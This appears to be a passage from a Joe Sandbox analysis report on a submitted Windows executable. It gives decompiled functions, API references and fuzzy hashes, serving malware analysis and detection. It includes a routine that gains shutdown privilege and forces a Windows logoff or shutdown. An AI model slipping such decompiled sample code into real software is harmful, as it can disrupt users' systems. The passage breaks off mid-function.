Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: a18361aca8c8cd19854c497da1c5df8c22eb068a4ed76aaa05032ecb41bf3def
Instruction ID: 0100484668eb2ec673971f2c2002f2d1f8e9036c79683c125d960c49dcf0e200
Opcode Fuzzy Hash: a18361aca8c8cd19854c497da1c5df8c22eb068a4ed76aaa05032ecb41bf3def
Instruction Fuzzy Hash: F8C04CA160460047CF40AABE96C5A0667DC5A4831830485B6B509DB287D679E8004616

Uniqueness

Uniqueness Score: -1.00%

Function 00406FD3 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00406FD3() {
				int _t4;
				intOrPtr _t7;
				void* _t8;

				_pop(_t7);
				 *[fs:eax] = _t7;
				_push(E00406FF1);
				_t4 = SetErrorMode( *(_t8 - 0xc)); // executed
				return _t4;
			}

0x00406fd5
0x00406fd8
0x00406fdb
0x00406fe4
0x00406fe9

APIs

SetErrorMode.KERNEL32(?,00406FF1), ref: 00406FE4

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: c51111e1e25d99d17199c414182c944520f619d1a36a2f89f90ff994ae3c25f4
Instruction ID: abcfd38a1ab0ef0a252bae7b45195bf0e82d725524646c77674a47b54488078b
Opcode Fuzzy Hash: c51111e1e25d99d17199c414182c944520f619d1a36a2f89f90ff994ae3c25f4
Instruction Fuzzy Hash: 7AB09B7661C2415DE715D7D5745153863D4D7C47103A1457BF504D25C0D93C94144518

Uniqueness

Uniqueness Score: -1.00%

Function 00406FEF Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406FEF() {
				int _t3;
				void* _t4;

				_t3 = SetErrorMode( *(_t4 - 0xc)); // executed
				return _t3;
			}

0x00406fe4
0x00406fe9

APIs

SetErrorMode.KERNEL32(?,00406FF1), ref: 00406FE4

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 9ff9caf4870ff00b0a4af28e5f3a84e7cd7d27b11fceb0bd6f572c2a938499ea
Instruction ID: 1ca7c60e997b8a15276a6c32a34fb71a107bb08a88b74019f3f5bffcc9320a10
Opcode Fuzzy Hash: 9ff9caf4870ff00b0a4af28e5f3a84e7cd7d27b11fceb0bd6f572c2a938499ea
Instruction Fuzzy Hash: D6A022A8C00002B2CE00E2E08080E3C23282A883003C00AA2320EB2080C83CC020020A

Uniqueness

Uniqueness Score: -1.00%

Function 00406948 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406948(char* __eax, char* __edx) {
				char* _t2;

				_t2 = CharPrevA(__eax, __edx); // executed
				return _t2;
			}

0x0040694a
0x0040694f

APIs

CharPrevA.USER32(?,?,00406944,?,00406621,?,?,00406D5F,00000000,00406D84,?,?,?,?,00000000,00000000), ref: 0040694A

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 7e177b4939afc4c66bc13d9e004dc105461eb321a55963552d83522ad7025e46
Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
Opcode Fuzzy Hash: 7e177b4939afc4c66bc13d9e004dc105461eb321a55963552d83522ad7025e46
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00407EE8 Relevance: 1.3, APIs: 1, Instructions: 62
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407EE8(void* __eax, void* __ebp, void* __fp0) {
				char _v16;
				char _v20;
				void* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				void* _t27;
				void* _t29;
				void* _t32;
				void* _t40;
				void* _t50;
				void* _t51;
				void* _t52;
				long _t54;

				_t63 = __fp0;
				_t40 = __eax;
				_t21 =  *((intOrPtr*)(__eax + 4))();
				_t57 = _t21 - 5;
				if(_t21 != 5) {
					E00407D54(1, __eax, _t50, _t52, _t57, __fp0);
				}
				E0040277C(_t40 + 0x10, 0x50);
				_t27 = E00408A80(_t40 + 0x10, 0x50,  &_v16,  &_v20, 5);
				_t58 = _t27;
				if(_t27 != 0) {
					E00407D54(3, _t40, _t50, _t52, _t58, _t63);
				}
				_t59 = _v16 - 0x4000000;
				if(_v16 > 0x4000000) {
					E00407D54(7, _t40, _t50, _t52, _t59, _t63);
				}
				_t54 = _v20 + _v16;
				if(_t54 !=  *(_t40 + 0x64)) {
					E00407E90(_t40);
					_t32 = VirtualAlloc(0, _t54, 0x1000, 4); // executed
					_t51 = _t32;
					 *(_t40 + 0x60) = _t51;
					if(_t51 == 0) {
						E0040584C();
					}
					 *(_t40 + 0x64) = _t54;
				}
				_t29 = E00408AD0(_t40 + 0x10,  *(_t40 + 0x60) + _v20,  *(_t40 + 0x60));
				 *((char*)(_t40 + 0xd)) = 1;
				return _t29;
			}

0x00407ee8
0x00407eee
0x00407efa
0x00407efd
0x00407f00
0x00407f07
0x00407f07
0x00407f16
0x00407f33
0x00407f38
0x00407f3a
0x00407f41
0x00407f41
0x00407f46
0x00407f4e
0x00407f55
0x00407f55
0x00407f5e
0x00407f65
0x00407f69
0x00407f78
0x00407f7d
0x00407f7f
0x00407f84
0x00407f86
0x00407f86
0x00407f8b
0x00407f8b
0x00407f9b
0x00407fa0
0x00407faa

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407F78

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f5ee04043d141bc93b2e19712bdcaa3e638a4e758214685487fe43678a6b7974
Instruction ID: 27211e820de311bc0538d5cae21252111a70d63bd272b26bebf0cdf4235cabc1
Opcode Fuzzy Hash: f5ee04043d141bc93b2e19712bdcaa3e638a4e758214685487fe43678a6b7974
Instruction Fuzzy Hash: 97117F71A042059BDB00FF59C881B5B3794EF84359F05847AFD59AB2C6DA38EC448BAB

Uniqueness

Uniqueness Score: -1.00%

Function 004015C4 Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015C4(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x40c43c; // 0x40c43c
				while(_t29 != 0x40c43c) {
					_t7 = _t29 + 8; // 0x0
					_t17 =  *_t7;
					_t8 = _t29 + 0xc; // 0x0
					_t27 =  *_t8 + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}

0x004015cb
0x004015cf
0x004015d6
0x004015eb
0x004015f3
0x004015f9
0x004015ff
0x00401602
0x00401646
0x0040160a
0x0040160a
0x0040160d
0x00401610
0x00401614
0x00401616
0x00401616
0x0040161c
0x0040161e
0x0040161e
0x00401624
0x00401631
0x00401638
0x0040163a
0x00401640
0x00000000
0x00401640
0x00401638
0x00401644
0x00401644
0x00401655

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00401631

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 41bc2e58eb8df21134a81ecef240e945b9dbf0f5d11c2332597d90ea76119035
Instruction ID: 625cd896077d7ae42c8eb3362da321aaa2c87eddc2731790e4d257a04fee8ae6
Opcode Fuzzy Hash: 41bc2e58eb8df21134a81ecef240e945b9dbf0f5d11c2332597d90ea76119035
Instruction Fuzzy Hash: 95113072A057019FC3109F19CD80A2BB7E5EBC4750F19CA3DE598A73A5D635AC408699

Uniqueness

Uniqueness Score: -1.00%

Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00401658(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x40c43c; // 0x40c43c
				while(_t19 != 0x40c43c) {
					_t2 = _t19 + 8; // 0x0
					_t9 =  *_t2;
					_t3 = _t19 + 0xc; // 0x0
					_t14 =  *_t3 + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x40c418 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}

0x0040165c
0x0040166d
0x00401674
0x0040167d
0x00401681
0x00401684
0x00401687
0x004016c7
0x0040168f
0x0040168f
0x00401692
0x00401695
0x0040169a
0x0040169c
0x0040169c
0x004016a1
0x004016a3
0x004016a3
0x004016a7
0x004016b2
0x004016b9
0x004016bb
0x004016bb
0x004016b9
0x004016c5
0x004016c5
0x004016d4

APIs

VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: a2f32dd8ef58eb042d1926e7c5d87192c2fb778a874e681f692e1318d4ea2181
Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
Opcode Fuzzy Hash: a2f32dd8ef58eb042d1926e7c5d87192c2fb778a874e681f692e1318d4ea2181
Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8

Uniqueness

Uniqueness Score: -1.00%

Function 00407520 Relevance: 1.3, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407520(void* __eax, void* __edx) {
				void* _t11;
				void* _t14;

				_t11 = __edx;
				_t14 = __eax;
				if( *((char*)(__eax + 8)) != 0) {
					CloseHandle( *(__eax + 4)); // executed
				}
				E00402918(0);
				if(_t11 != 0) {
					E00402B04(_t14);
				}
				return _t14;
			}

0x00407522
0x00407524
0x0040752a
0x00407530
0x00407530
0x00407539
0x00407540
0x00407544
0x00407544
0x0040754d

APIs

CloseHandle.KERNEL32(?), ref: 00407530

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a2389ee9af51d513acc6a320286ed4051c53adf15b73d93af9aca7eb2ec49a3e
Instruction ID: 5a159c3d01a9820a18767da314715944201262ed19b4247e75628cbb53a0a2b5
Opcode Fuzzy Hash: a2389ee9af51d513acc6a320286ed4051c53adf15b73d93af9aca7eb2ec49a3e
Instruction Fuzzy Hash: 7DD05E82B00A6017D215E6BF5D8968792D85F88649B08943BF644E77D1D67CEC018389

Uniqueness

Uniqueness Score: -1.00%

Function 00407E90 Relevance: 1.3, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407E90(void* __eax) {
				void* _t6;
				void* _t9;

				_t9 = __eax;
				 *((intOrPtr*)(__eax + 0x64)) = 0;
				_t6 =  *(__eax + 0x60);
				if(_t6 != 0) {
					VirtualFree(_t6, 0, 0x8000); // executed
					 *((intOrPtr*)(_t9 + 0x60)) = 0;
					return 0;
				}
				return _t6;
			}

0x00407e91
0x00407e95
0x00407e98
0x00407e9d
0x00407ea7
0x00407eae
0x00000000
0x00407eae
0x00407eb2

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,00407E75), ref: 00407EA7

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: de36b70e41bd06f87498fd740324f0b0b6f6b894c85e6a566519709c031c7ca8
Instruction ID: ca962a925045da2dfad8f37957b07a4422411a8b4a2e8e6c1baa8f4d738a0fe6
Opcode Fuzzy Hash: de36b70e41bd06f87498fd740324f0b0b6f6b894c85e6a566519709c031c7ca8
Instruction Fuzzy Hash: 2CD0E9B1B553045BDB90EEB98CC1B073BD87B48610F5044B66D04EB296E674E8009624

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00409420 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00409420() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				signed int _t6;

				if( *0x40b07c != 2) {
					L5:
					_t6 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return  ~( ~_t6);
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}

0x0040942a
0x00409487
0x0040948b
0x00409492
0x00000000
0x00409494
0x0040943c
0x0040944e
0x00409453
0x0040945b
0x00409475
0x00409481
0x00000000
0x00000000
0x00000000
0x00409483
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 0040942F
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00409435
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0040944E
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 00409475
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040947A
ExitWindowsEx.USER32 ref: 0040948B

Strings

SeShutdownPrivilege, xrefs: 00409447

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: f3cc37a1b4d9e5a2598b2c7913c69b94567c892d5ed28c5b10f7773e08e168bb
Instruction ID: 1fc3554a8dc1f29b0292fabda2083ca89024c973c65bb30774c19f74add59f7f
Opcode Fuzzy Hash: f3cc37a1b4d9e5a2598b2c7913c69b94567c892d5ed28c5b10f7773e08e168bb
Instruction Fuzzy Hash: 9CF012B068830275E620EAB58C07F6B62985BC4B58F50493EBA55FA1C3D7BCD805466F

Uniqueness

Uniqueness Score: -1.00%

Function 00409BC4 Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409BC4() {
				struct HRSRC__* _t10;
				void* _t11;
				void* _t12;

				_t10 = FindResourceA(0, 0x2b67, 0xa);
				if(_t10 == 0) {
					E00409A78();
				}
				if(SizeofResource(0, _t10) != 0x2c) {
					E00409A78();
				}
				_t11 = LoadResource(0, _t10);
				if(_t11 == 0) {
					E00409A78();
				}
				_t12 = LockResource(_t11);
				if(_t12 == 0) {
					E00409A78();
				}
				return _t12;
			}

0x00409bd3
0x00409bd7
0x00409bd9
0x00409bd9
0x00409be9
0x00409beb
0x00409beb
0x00409bf8
0x00409bfc
0x00409bfe
0x00409bfe
0x00409c09
0x00409c0d
0x00409c0f
0x00409c0f
0x00409c17

APIs

FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BCE
SizeofResource.KERNEL32(00000000,00000000,?,00409CBE,00000000,0040A255,?,00000001,00000000,00000002,00000000,0040A29D,?,00000000,0040A2D4), ref: 00409BE1
LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CBE,00000000,0040A255,?,00000001,00000000,00000002,00000000,0040A29D,?,00000000), ref: 00409BF3
LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CBE,00000000,0040A255,?,00000001,00000000,00000002,00000000,0040A29D), ref: 00409C04

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 2cdda8eab16d5b4496744ca62c04feacbae1ad7bb305a55acc901784ed733a80
Instruction ID: 1e58386bb316d19176e05016790693ee75a85c5c0d7d9a3d31869649b270ac48
Opcode Fuzzy Hash: 2cdda8eab16d5b4496744ca62c04feacbae1ad7bb305a55acc901784ed733a80
Instruction Fuzzy Hash: 11E05A80B8974225FA6076FA1CDBB7A60485BA575EF00013BB701792D3EDACCC44462E

Uniqueness

Uniqueness Score: -1.00%

Function 00405220 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00405220(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}

0x00405223
0x00405224
0x0040523a
0x00405241
0x0040523c
0x0040523c
0x0040523c
0x00405247

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,00405422,?,?,?,00000000,004055D4), ref: 00405233

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 2a77f73eaf4decfe1d3c6d9e0d09371ffd2471663f192bd5980b59e05319332a
Instruction ID: c1568b9747b496de9f49d7e0966a014651e68b21b5db7c9347b601c8a39b330c
Opcode Fuzzy Hash: 2a77f73eaf4decfe1d3c6d9e0d09371ffd2471663f192bd5980b59e05319332a
Instruction Fuzzy Hash: 38D05EB630E2502AE210919A2D85EBB5A9CCEC57A4F14447EBA48D7242D2248C069BB6

Uniqueness

Uniqueness Score: -1.00%

Function 004026C4 Relevance: 1.5, APIs: 1, Instructions: 20
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004026C4() {
				void* _v14;
				void* _v16;
				struct _SYSTEMTIME _v28;
				signed int _t13;

				GetSystemTime( &_v28);
				_t13 = ((_v28.wHour & 0x0000ffff) * 0x3c + _v28.wMinute) * 0x3c * 0x3e8;
				 *0x40c02c = _t13;
				return _t13;
			}

0x004026ce
0x004026f3
0x004026f5
0x004026fe

APIs

GetSystemTime.KERNEL32(?), ref: 004026CE

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: SystemTime
String ID:
API String ID: 2656138-0
Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748

Uniqueness

Uniqueness Score: -1.00%

Function 00405CBC Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CBC() {
				intOrPtr _v132;
				int _t2;
				intOrPtr _t3;
				struct _OSVERSIONINFOA* _t4;

				_t4->dwOSVersionInfoSize = 0x94;
				_t2 = GetVersionExA(_t4);
				if(_t2 != 0) {
					_t3 = _v132;
					 *0x40b07c = _t3;
					return _t3;
				}
				return _t2;
			}

0x00405cc2
0x00405cca
0x00405cd1
0x00405cd3
0x00405cd7
0x00000000
0x00405cd7
0x00405ce2

APIs

GetVersionExA.KERNEL32(?,004065B8,00000000,004065C6,?,?,?,?,?,00409C3D), ref: 00405CCA

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 2ab3f3637bfc435a5a36f1299b851b4585cd8587848ded99d3738cdcc25c881a
Instruction ID: 17575d513037fabffbf9d99d41b13844c3ba0cd5a0a0786c0aabd179b5f610b8
Opcode Fuzzy Hash: 2ab3f3637bfc435a5a36f1299b851b4585cd8587848ded99d3738cdcc25c881a
Instruction Fuzzy Hash: E6C012604047018AE3105B319C02B1A72D4A744310F4405396DA8D13C2E73C84028A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004083E4 Relevance: .5, Instructions: 545
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004083E4(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v25;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				char _v64;
				char* _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v89;
				char _v96;
				signed int _v100;
				signed int _v104;
				short* _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				signed int _t370;
				void* _t375;
				signed int _t377;
				signed int _t381;
				signed int _t389;
				signed int _t395;
				signed int _t411;
				intOrPtr _t422;
				signed int _t426;
				signed int _t435;
				void* _t448;
				signed int _t458;
				char _t460;
				signed int _t474;
				char* _t503;
				signed int _t508;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t622;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 =  *((intOrPtr*)(_v8 + 0x10));
				_v24 = 0;
				_v32 = (1 <<  *(_v8 + 8)) - 1;
				_v36 = (1 <<  *(_v8 + 4)) - 1;
				_v40 =  *_v8;
				_t617 =  *((intOrPtr*)(_v8 + 0x34));
				_t474 =  *(_v8 + 0x44);
				_v44 =  *((intOrPtr*)(_v8 + 0x38));
				_v48 =  *((intOrPtr*)(_v8 + 0x3c));
				_v52 =  *((intOrPtr*)(_v8 + 0x40));
				_v56 =  *((intOrPtr*)(_v8 + 0x48));
				_v60 =  *((intOrPtr*)(_v8 + 0x2c));
				_v64 =  *((intOrPtr*)(_v8 + 0x30));
				_v68 =  *((intOrPtr*)(_v8 + 0x1c));
				_v72 =  *((intOrPtr*)(_v8 + 0xc));
				_t616 =  *((intOrPtr*)(_v8 + 0x28));
				_v128 =  *((intOrPtr*)(_v8 + 0x20));
				_v124 =  *((intOrPtr*)(_v8 + 0x24));
				_v120 = _v12;
				_v136 =  *((intOrPtr*)(_v8 + 0x14));
				_v132 =  *((intOrPtr*)(_v8 + 0x18));
				 *_a4 = 0;
				if(_v56 == 0xffffffff) {
					return 0;
				}
				__eflags = _v72;
				if(_v72 == 0) {
					_v68 =  &_v76;
					_v72 = 1;
